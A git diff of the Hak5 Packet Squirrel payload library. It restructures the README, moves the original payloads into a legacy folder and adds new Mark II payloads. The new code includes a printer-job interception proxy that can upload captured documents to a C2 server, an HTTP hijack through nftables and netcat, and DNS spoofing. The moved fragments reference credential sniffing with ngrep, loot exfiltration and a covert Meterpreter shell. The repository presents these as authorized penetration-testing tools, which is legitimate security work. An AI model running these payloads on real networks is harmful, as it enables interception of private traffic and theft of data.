diff --git a/README.md b/README.md index 2752ede..53cc292 100644 --- a/README.md +++ b/README.md 
@@ -1,39 +1,63 @@ # Payload Library for the Packet Squirrel by Hak5 -This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads. +This repository contains payloads and extensions for the Hak5 Packet Squirrel, developed by the Hak5 Community. + +Have a great payload? Submit it by forking the payload repository and submitting a pull request!A + +Learn more about Github pull requests [here](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests) or from the Hak5 Bash Bunny tutorial [here](https://www.youtube.com/watch?v=H6z9BXevsZg). + +## Packet Squirrel Versions + +The Packet Squirrel Mark II expands on the capabilities of the original Packet Squirrel, introducing new commands and more flexible networking configurations. + +Payloads for the original Packet Squirrel can be found in the `legacy-mk1` directory. These payloads may not work without modification on the Packet Squirrel Mark II. ## About the Packet Squirrel -The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle. +The Packet Squirrel Mark II by Hak5 is a stealthy pocket-sized man-in-the-middle. This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch. 
- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5") -- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation") +- [Documentation](https://docs.hak5.org/packet-squirrel-mark-ii "Documentation") - [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums") - [Discord](https://hak5.org/discord "Discord") ![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg) ## Updating + If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/). ## Disclaimer -Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. + +Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness or safety. As with any script, you are advised to proceed with caution. ## Legal + Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. 
## Contributing -Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available. + +Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publicly available. Please adhere to the following best practices and style guide when submitting a payload. +Hak5 reserves the right to modify payloads to meet the guidelines when necessary, or to decline to include a payload in the public repository. + +Please ensure that any default configuration values do not point to actual services! Do not include *your* passwords or login information in submitted payloads! + ### Naming Conventions -Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category. + +Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be placed into its own directory, with `-` or `_` used in place of spaces, in one of the categories such as exfiltration, phishing, remote_access or recon. Please do not create your own category. + +The payload itself should be named `payload`. + +Additional files and documentation can be included in the payload directory. Documentation should be in `README.md` or `README.txt`. ### Comments + Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful. # Title: Meterpreter-via-SSH 
@@ -53,6 +77,7 @@ Payloads should begin with comments specifying at the very least the name of the # Cyan Blink 1 Time - Meterpreter Successful ### Configuration Options + Configurable options should be specified in variables at the top of the payload.txt file # Options @@ -61,9 +86,11 @@ Configurable options should be specified in variables at the top of the payload. MSF_PORT=31337 ### LED + The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`. LED SETUP NETMODE NAT Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states. + diff --git a/legacy-mk1/README.md b/legacy-mk1/README.md new file mode 100644 index 0000000..60a5e16 --- /dev/null +++ b/legacy-mk1/README.md 
@@ -0,0 +1,75 @@ +# Legacy payloads + +These payloads are for the original Packet Squirrel device. + +They may or may not run without modification on the Packet Squirrel Mark II. + + +## Payload Library for the Packet Squirrel by Hak5 + +This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads. + +## About the Packet Squirrel + +The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle. + +This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch. + +- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5") +- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation") +- [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums") +- [Discord](https://hak5.org/discord "Discord") + +![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg) + +## Updating +If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/). + +## Disclaimer +Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. + +## Legal +Payloads from this repository are provided for educational purposes only. 
Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. + +## Contributing +Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available. + +Please adhere to the following best practices and style guide when submitting a payload. + +### Naming Conventions +Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category. + +### Comments +Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful. 
+ + # Title: Meterpreter-via-SSH + # Description: Covert meterpreter shell via overt SSH connection + # Author: Zappus + # Version: 1.0 + # Category: Remote-Access + # Net Mode: NAT + # Firmware: 1.2 + # + # LED State Descriptions + # Magenta Solid - Configuring NETMODE + # LED OFF - Waiting for BUTTON + # Red Blink 2 Times - SSH Connection Failed + # Amber Blink 5 Times - SSH Connection Successful + # Red Blink 1 Time - Meterpreter Failed + # Cyan Blink 1 Time - Meterpreter Successful + +### Configuration Options +Configurable options should be specified in variables at the top of the payload.txt file + + # Options + SSH_USER="username" + SSH_HOST="hostname" + MSF_PORT=31337 + +### LED +The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`. + + LED SETUP + NETMODE NAT + +Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states. diff --git a/payloads/library/exfiltration/Email-Sender/README.md b/legacy-mk1/payloads/library/exfiltration/Email-Sender/README.md similarity index 100% rename from payloads/library/exfiltration/Email-Sender/README.md rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/README.md 
diff --git a/payloads/library/exfiltration/Email-Sender/SENDMAIL b/legacy-mk1/payloads/library/exfiltration/Email-Sender/SENDMAIL similarity index 100% rename from payloads/library/exfiltration/Email-Sender/SENDMAIL rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/SENDMAIL diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh old mode 100644 new mode 100755 similarity index 86% rename from payloads/library/exfiltration/Email-Sender/payload.sh rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh index 0418657..0616e8a --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II + function run() { LED STAGE1 SWITCH_POS=$(SWITCH) diff --git a/payloads/library/exfiltration/Email-Sender/sendemail.py b/legacy-mk1/payloads/library/exfiltration/Email-Sender/sendemail.py similarity index 100% rename from payloads/library/exfiltration/Email-Sender/sendemail.py rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/sendemail.py diff --git a/payloads/library/exfiltration/FreeDaNutz/README.md b/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/README.md similarity index 100% rename from payloads/library/exfiltration/FreeDaNutz/README.md rename to legacy-mk1/payloads/library/exfiltration/FreeDaNutz/README.md diff --git a/payloads/library/exfiltration/FreeDaNutz/payload.sh b/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh similarity index 98% rename from payloads/library/exfiltration/FreeDaNutz/payload.sh rename to legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh index 07f3633..b6e12f1 100644 --- a/payloads/library/exfiltration/FreeDaNutz/payload.sh +++ b/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh 
@@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: FreeDaNutz # Description: This payload will compress the loot folder and then send that file to a remote server via scp diff --git a/payloads/library/general/I-Hate-Wifi/README.md b/legacy-mk1/payloads/library/general/I-Hate-Wifi/README.md similarity index 100% rename from payloads/library/general/I-Hate-Wifi/README.md rename to legacy-mk1/payloads/library/general/I-Hate-Wifi/README.md diff --git a/payloads/library/general/I-Hate-Wifi/payload.sh b/legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh old mode 100644 new mode 100755 similarity index 88% rename from payloads/library/general/I-Hate-Wifi/payload.sh rename to legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh index 594c46b..6ea1683 --- a/payloads/library/general/I-Hate-Wifi/payload.sh +++ b/legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II + function scan() { LED G ifconfig wlan0 down diff --git a/payloads/library/general/Wake-On-Lan/README.md b/legacy-mk1/payloads/library/general/Wake-On-Lan/README.md similarity index 100% rename from payloads/library/general/Wake-On-Lan/README.md rename to legacy-mk1/payloads/library/general/Wake-On-Lan/README.md diff --git a/payloads/library/general/Wake-On-Lan/payload.sh b/legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh old mode 100644 new mode 100755 similarity index 82% rename from payloads/library/general/Wake-On-Lan/payload.sh rename to legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh index dc71da8..9b273d6 --- a/payloads/library/general/Wake-On-Lan/payload.sh +++ b/legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh 
@@ -1,4 +1,8 @@ #!/bin/bash + +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II + LED STAGE1 NETMODE NAT diff --git a/payloads/library/general/Wake-On-Lan/wol.py b/legacy-mk1/payloads/library/general/Wake-On-Lan/wol.py similarity index 100% rename from payloads/library/general/Wake-On-Lan/wol.py rename to legacy-mk1/payloads/library/general/Wake-On-Lan/wol.py diff --git a/payloads/library/general/caternet/index.html b/legacy-mk1/payloads/library/general/caternet/index.html similarity index 100% rename from payloads/library/general/caternet/index.html rename to legacy-mk1/payloads/library/general/caternet/index.html diff --git a/payloads/library/general/caternet/kerby1.jpg b/legacy-mk1/payloads/library/general/caternet/kerby1.jpg similarity index 100% rename from payloads/library/general/caternet/kerby1.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby1.jpg diff --git a/payloads/library/general/caternet/kerby2.jpg b/legacy-mk1/payloads/library/general/caternet/kerby2.jpg similarity index 100% rename from payloads/library/general/caternet/kerby2.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby2.jpg diff --git a/payloads/library/general/caternet/kerby3.jpg b/legacy-mk1/payloads/library/general/caternet/kerby3.jpg similarity index 100% rename from payloads/library/general/caternet/kerby3.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby3.jpg diff --git a/payloads/library/general/caternet/kerby4.jpg b/legacy-mk1/payloads/library/general/caternet/kerby4.jpg similarity index 100% rename from payloads/library/general/caternet/kerby4.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby4.jpg diff --git a/payloads/library/general/caternet/kerby5.jpg b/legacy-mk1/payloads/library/general/caternet/kerby5.jpg similarity index 100% rename from payloads/library/general/caternet/kerby5.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby5.jpg 
diff --git a/payloads/library/general/caternet/kerby6.jpg b/legacy-mk1/payloads/library/general/caternet/kerby6.jpg similarity index 100% rename from payloads/library/general/caternet/kerby6.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby6.jpg diff --git a/payloads/library/general/caternet/kerby7.jpg b/legacy-mk1/payloads/library/general/caternet/kerby7.jpg similarity index 100% rename from payloads/library/general/caternet/kerby7.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby7.jpg diff --git a/payloads/library/general/caternet/kerby8.jpg b/legacy-mk1/payloads/library/general/caternet/kerby8.jpg similarity index 100% rename from payloads/library/general/caternet/kerby8.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby8.jpg diff --git a/payloads/library/general/caternet/kerby9.JPG b/legacy-mk1/payloads/library/general/caternet/kerby9.JPG similarity index 100% rename from payloads/library/general/caternet/kerby9.JPG rename to legacy-mk1/payloads/library/general/caternet/kerby9.JPG diff --git a/payloads/library/general/caternet/payload.sh b/legacy-mk1/payloads/library/general/caternet/payload.sh similarity index 75% rename from payloads/library/general/caternet/payload.sh rename to legacy-mk1/payloads/library/general/caternet/payload.sh index a101842..bd90120 100644 --- a/payloads/library/general/caternet/payload.sh +++ b/legacy-mk1/payloads/library/general/caternet/payload.sh @@ -1,4 +1,8 @@ # Title: Caternet +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Author: Hak5Darren # Version: 1.0 # Description: Forwards all traffic to local webserver hosting cat photos. 
diff --git a/payloads/library/interception/dnsspoof/payload.sh b/legacy-mk1/payloads/library/interception/dnsspoof/payload.sh similarity index 86% rename from payloads/library/interception/dnsspoof/payload.sh rename to legacy-mk1/payloads/library/interception/dnsspoof/payload.sh index b83951a..7097bae 100755 --- a/payloads/library/interception/dnsspoof/payload.sh +++ b/legacy-mk1/payloads/library/interception/dnsspoof/payload.sh @@ -1,4 +1,7 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II # # Title: DNSSpoof # Description: Forge replies to arbitrary DNS queries using DNSMasq diff --git a/payloads/library/interception/dnsspoof/spoofhost b/legacy-mk1/payloads/library/interception/dnsspoof/spoofhost similarity index 100% rename from payloads/library/interception/dnsspoof/spoofhost rename to legacy-mk1/payloads/library/interception/dnsspoof/spoofhost diff --git a/payloads/library/recon/ipinfo/payload.txt b/legacy-mk1/payloads/library/recon/ipinfo/payload.txt old mode 100644 new mode 100755 similarity index 94% rename from payloads/library/recon/ipinfo/payload.txt rename to legacy-mk1/payloads/library/recon/ipinfo/payload.txt index b7517fe..7fd7c8e --- a/payloads/library/recon/ipinfo/payload.txt +++ b/legacy-mk1/payloads/library/recon/ipinfo/payload.txt @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: IP Info # Author: Hak5Darren # Version: 1.0 diff --git a/payloads/library/recon/nmapdump/README.md b/legacy-mk1/payloads/library/recon/nmapdump/README.md similarity index 100% rename from payloads/library/recon/nmapdump/README.md rename to legacy-mk1/payloads/library/recon/nmapdump/README.md 
diff --git a/payloads/library/recon/nmapdump/payload.sh b/legacy-mk1/payloads/library/recon/nmapdump/payload.sh similarity index 98% rename from payloads/library/recon/nmapdump/payload.sh rename to legacy-mk1/payloads/library/recon/nmapdump/payload.sh index 9b09131..0cadbd1 100644 --- a/payloads/library/recon/nmapdump/payload.sh +++ b/legacy-mk1/payloads/library/recon/nmapdump/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: NMap Dump # Description: Dumps NMap scan data to USB storage. # Author: infoskirmish.com diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/README.md b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/README.md similarity index 100% rename from payloads/library/remote-access/Meterpreter-via-SSH/README.md rename to legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/README.md diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh old mode 100644 new mode 100755 similarity index 95% rename from payloads/library/remote-access/Meterpreter-via-SSH/payload.sh rename to legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh index aae8991..006d2dc --- a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: Meterpreter-via-SSH # Description: Covert meterpreter shell via overt SSH connection # Author: Zappus 
diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/server.rc b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/server.rc similarity index 100% rename from payloads/library/remote-access/Meterpreter-via-SSH/server.rc rename to legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/server.rc diff --git a/payloads/library/remote-access/SSH-remote-access/payload.sh b/legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh old mode 100644 new mode 100755 similarity index 95% rename from payloads/library/remote-access/SSH-remote-access/payload.sh rename to legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh index a12680f..6c61da0 --- a/payloads/library/remote-access/SSH-remote-access/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: SSH Remote Management Tool for Packet Squirrel # Description: Makes packet Squirrel directly accessible via SSH on a remote server # Author: BlackPropaganda @@ -85,4 +89,4 @@ uci commit autossh LED ATTACK # starting autossh -/etc/init.d/autossh start \ No newline at end of file +/etc/init.d/autossh start diff --git a/payloads/library/remote-access/SSH-remote-access/readme.md b/legacy-mk1/payloads/library/remote-access/SSH-remote-access/readme.md similarity index 100% rename from payloads/library/remote-access/SSH-remote-access/readme.md rename to legacy-mk1/payloads/library/remote-access/SSH-remote-access/readme.md diff --git a/payloads/library/remote-access/Togglable-VPN/payload.sh b/legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh similarity index 89% rename from payloads/library/remote-access/Togglable-VPN/payload.sh rename to legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh index 1490660..c93c0ba 100644 
--- a/payloads/library/remote-access/Togglable-VPN/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: Togglable-VPN # Description: Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server, # or if the button is pressed, send traffic from the clients through said tunnel. diff --git a/payloads/library/remote-access/openvpn/config.ovpn b/legacy-mk1/payloads/library/remote-access/openvpn/config.ovpn similarity index 100% rename from payloads/library/remote-access/openvpn/config.ovpn rename to legacy-mk1/payloads/library/remote-access/openvpn/config.ovpn diff --git a/payloads/library/remote-access/openvpn/payload.sh b/legacy-mk1/payloads/library/remote-access/openvpn/payload.sh similarity index 92% rename from payloads/library/remote-access/openvpn/payload.sh rename to legacy-mk1/payloads/library/remote-access/openvpn/payload.sh index 37bf7b3..4e65160 100755 --- a/payloads/library/remote-access/openvpn/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/openvpn/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: OpenVPN # Description: Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel. # Author: Hak5 diff --git a/payloads/library/sniffing/ispyintel/README.md b/legacy-mk1/payloads/library/sniffing/ispyintel/README.md similarity index 100% rename from payloads/library/sniffing/ispyintel/README.md rename to legacy-mk1/payloads/library/sniffing/ispyintel/README.md 
diff --git a/payloads/library/sniffing/ispyintel/payload.sh b/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh similarity index 97% rename from payloads/library/sniffing/ispyintel/payload.sh rename to legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh index 65a7b54..80da2b2 100644 --- a/payloads/library/sniffing/ispyintel/payload.sh +++ b/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: iSpy Passive Intel Gathering # Description: Launches various tools to sniff out intel data. diff --git a/payloads/library/sniffing/ngrep/payload.sh b/legacy-mk1/payloads/library/sniffing/ngrep/payload.sh old mode 100644 new mode 100755 similarity index 89% rename from payloads/library/sniffing/ngrep/payload.sh rename to legacy-mk1/payloads/library/sniffing/ngrep/payload.sh index ed90c40..e18c20b --- a/payloads/library/sniffing/ngrep/payload.sh +++ b/legacy-mk1/payloads/library/sniffing/ngrep/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # ngrep payload to snag creds NGREP_OPTIONS=("-wiql" "user|pass" "port" "21") diff --git a/payloads/library/sniffing/ngrep/readme.md b/legacy-mk1/payloads/library/sniffing/ngrep/readme.md similarity index 100% rename from payloads/library/sniffing/ngrep/readme.md rename to legacy-mk1/payloads/library/sniffing/ngrep/readme.md diff --git a/payloads/library/sniffing/tcpdump/payload.sh b/legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh similarity index 91% rename from payloads/library/sniffing/tcpdump/payload.sh rename to legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh index c7c4101..971624b 100755 --- a/payloads/library/sniffing/tcpdump/payload.sh +++ b/legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh 
@@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: TCPDump # Description: Dumps networking-data to USB storage. Completes on button-press or storage full. # Author: Hak5 diff --git a/payloads/switch1/payload.sh b/legacy-mk1/payloads/switch1/payload.sh similarity index 100% rename from payloads/switch1/payload.sh rename to legacy-mk1/payloads/switch1/payload.sh diff --git a/payloads/switch2/payload.sh b/legacy-mk1/payloads/switch2/payload.sh similarity index 100% rename from payloads/switch2/payload.sh rename to legacy-mk1/payloads/switch2/payload.sh diff --git a/payloads/switch3/payload.sh b/legacy-mk1/payloads/switch3/payload.sh similarity index 100% rename from payloads/switch3/payload.sh rename to legacy-mk1/payloads/switch3/payload.sh diff --git a/payloads/exfiltration/pcl_printer/payload b/payloads/exfiltration/pcl_printer/payload new file mode 100755 index 0000000..4e588e7 --- /dev/null +++ b/payloads/exfiltration/pcl_printer/payload 
@@ -0,0 +1,53 @@ +#!/bin/bash + +# Title: PCL Printer Capture +# Description: Capture PCL IP printer jobs with a dynamic proxy +# Author: Hak5 + +# To convert PCL files to PDF, use a tool like GhostPCL: +# https://ghostscript.com/releases/gpcldnld.html +# +# To convert a stream (captured-file.stream) to PDF (printed.pdf), use something +# like: +# ./gpcl6-1000-linux-x86_64 -o printed.pdf -sDEVICE=pdfwrite captured-file.stream + +# Do we automatically exfiltrate to Cloud C2? Uncomment to send files to your +# CloudC2 server automatically +# +# USE_C2=1 + +# By default, C2WATCHDIR removes files after they're sent. To keep them, uncomment +# C2_KEEP_FILES below +# +# C2_KEEP_FILES=1 + +LED SETUP + +NETMODE NAT + +# We have to have attached USB +USB_WAIT + +# Make sure the directory exists +mkdir /usb/printer/ + +# If USE_C2 isn't empty, we're uploading to CloudC2 +if [[ ! -z "$USE_C2" ]]; then + # If C2_KEEP_FILES is not empty, we want to preserve the + # files on USB, otherwise run C2WATCHDIR normally and delete + # the files after they are sent. + if [[ ! -z "$C2_KEEP_FILES" ]]; then + C2_KEEP_FILES=1 C2WATCHDIR /usb/printer/ & + else + C2WATCHDIR /usb/printer/ & + fi + + # Give C2WATCHDIR a moment to sync any old files that were present + sleep 3 +fi + +LED ATTACK + +# Use a dynamic proxy to MITM standard PCL IP printers +DYNAMICPROXY CLIENT /usb/printer/print_ 9100 + diff --git a/payloads/general/gatekeeper/payload b/payloads/general/gatekeeper/payload new file mode 100755 index 0000000..9b5ce90 --- /dev/null +++ b/payloads/general/gatekeeper/payload 
@@ -0,0 +1,32 @@ +#!/bin/bash + +# Title: Gatekeeper +# +# Description: Toggle access to the network with the pushbutton +# Author: Hak5 + +# Set the default network mode (such as NAT or BRIDGE) +NETWORK_MODE="BRIDGE" + +NETMODE ${NETWORK_MODE} + +LED G SOLID + +while true; do + # Run the buttom command with no LED; this way the LED stays + # solid green + NO_LED=1 BUTTON + + # Check the existing network mode; if we're not the right mode, + # send the target device to jail + if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]; then + LED R FAST + NETMODE JAIL + LED R SOLID + else + # Set the network mode back to our normal mode + LED G FAST + NETMODE ${NETWORK_MODE} + LED G SOLID + fi +done diff --git a/payloads/interception/dns_sinkhole/payload b/payloads/interception/dns_sinkhole/payload new file mode 100755 index 0000000..93c7064 --- /dev/null +++ b/payloads/interception/dns_sinkhole/payload @@ -0,0 +1,14 @@ +#!/bin/bash + +# Title: DNS Sinkhole +# Description: Demonstrate sinkholing a DNS domain (hak5.org) +# Author: Hak5 + +# This payload will intercept any requests for a *.hak5.org domain +# and redirect them to localhost (127.0.0.1 for IPv4 or ::1 for IPv6) + +NETMODE BRIDGE + +LED R SINGLE + +SPOOFDNS br-lan '.*.hak5.org=127.0.0.1' 'hak5.org=127.0.0.1' '.*.hak5.org=::1' 'hak5.org=::1' diff --git a/payloads/interception/web_intercept/payload b/payloads/interception/web_intercept/payload new file mode 100755 index 0000000..fc8da16 --- /dev/null +++ b/payloads/interception/web_intercept/payload 
@@ -0,0 +1,30 @@ +#!/bin/bash + +# Title: Minimalistic web intercept +# Description: Replace HTTP with Squirrels. +# Author: Hak5 +# +# squirrel.jpg from Wikipedia +# https://upload.wikimedia.org/wikipedia/commons/6/68/Sciuridae.jpg +# By Chicoutimi (montage)KarakalAndiWNational Park Serviceen +# User:Markus KrötzschThe Lilac Breasted RollerNico Conradie from Centurion, +# South AfricaHans HillewaertSylvouilleNational Park Service - Own work, CC BY 3.0, +# https://commons.wikimedia.org/w/index.php?curid=10213698 + +NETMODE NAT +LED B SOLID + +# Add a web payload to the nftables +nft add table ip webpayload + +# Hook prerouting +nft -- add chain ip webpayload prerouting { type nat hook prerouting priority -100 \; } + +# Redirect port 80 to our local 8080 +nft add rule ip webpayload prerouting tcp dport 80 redirect to :8080 + +while true; + do echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n" | \ + cat - /root/payloads/$(SWITCH)/squirrel.jpg | \ + netcat -l -p 8080; +done diff --git a/payloads/interception/web_intercept/squirrel.jpg b/payloads/interception/web_intercept/squirrel.jpg new file mode 100644 index 0000000..5a9ab26 Binary files /dev/null and b/payloads/interception/web_intercept/squirrel.jpg differ diff --git a/payloads/recon/nmapdump/README.md b/payloads/recon/nmapdump/README.md new file mode 100644 index 0000000..76a9efe --- /dev/null +++ b/payloads/recon/nmapdump/README.md 
@@ -0,0 +1,30 @@ +Title: NMap Dump + +Description: Dumps NMap scan data to USB storage. + +Author: infoskirmish.com + +Version: 2.0 + +Category: sniffing + +Target: Any + +Net Mode: NAT + + +LEDs + +SUCCESS: Scan complete + +FAIL: No USB storage found + +SCANNING: Rapid White + +This payload will launch NMap on a given interface (default eth0) and scan the local subnet. There is no need to know the subnet as the payload will capture and infer the subnet from the IP it receives while launching. + +The payload will store scan files in all three file types supported by nmap. Also the payload will create a log.txt file to dump process information which may be useful to troubleshoot errors. The default path is /mnt/loot/nmapdump + +The payload has common variables that maybe changed located at the top of the file making customizing this payload as your deployment needs dictate. + +Updated for the Packet Squirrel Mark II by Hak5 diff --git a/payloads/recon/nmapdump/payload.sh b/payloads/recon/nmapdump/payload.sh new file mode 100644 index 0000000..f1c333f --- /dev/null +++ b/payloads/recon/nmapdump/payload.sh 
